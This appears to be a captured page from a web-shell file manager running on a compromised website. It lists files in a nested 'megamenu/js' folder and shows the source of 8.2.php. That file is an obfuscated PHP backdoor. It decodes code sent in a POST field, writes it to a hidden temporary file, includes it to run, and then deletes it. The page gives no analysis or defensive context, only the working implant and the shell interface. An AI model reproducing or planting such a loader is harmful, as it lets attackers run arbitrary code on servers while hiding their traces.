at path:
ROOT
/
megamenu
/
js
/
js
/
js
/
js
/
8.2.php
run:
R
W
Run
js
DIR
2026-04-09 04:12:40
R
W
Run
8.2.php
954 By
2025-11-10 06:37:29
R
W
Run
Delete
Rename
error_log
1.6 KB
2026-04-19 20:34:06
R
W
Run
Delete
Rename
index.php
1.72 KB
2025-11-10 06:37:29
R
W
Run
Delete
Rename
tnCLBNw.avi
5.62 KB
2025-11-10 06:37:29
R
W
Run
Delete
Rename
error_log
up
📄
8.2.php
Save
<?php if(@$_POST["fl\x67"] !== null){ $desc = array_filter(["/tmp", getenv("TMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TEMP")]); $entry = $_POST["fl\x67"]; $entry = explode ( "." ,$entry ) ; $sym = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $w = 0; $__len = count($entry); do { if ($w >=$__len) break; $v3 = $entry[$w]; $sChar = ord($salt[$w%$lenS]); $d = ((int)$v3 - $sChar - ($w%10)) ^ 98; $sym.= chr($d); $w++; } while (true); foreach ($desc as $key => $itm) { if (is_dir($itm) ? is_writable($itm) : false) { $binding = join("/", [$itm, ".fac"]); if (file_put_contents($binding, $sym)) { include $binding; @unlink($binding); exit; } } } }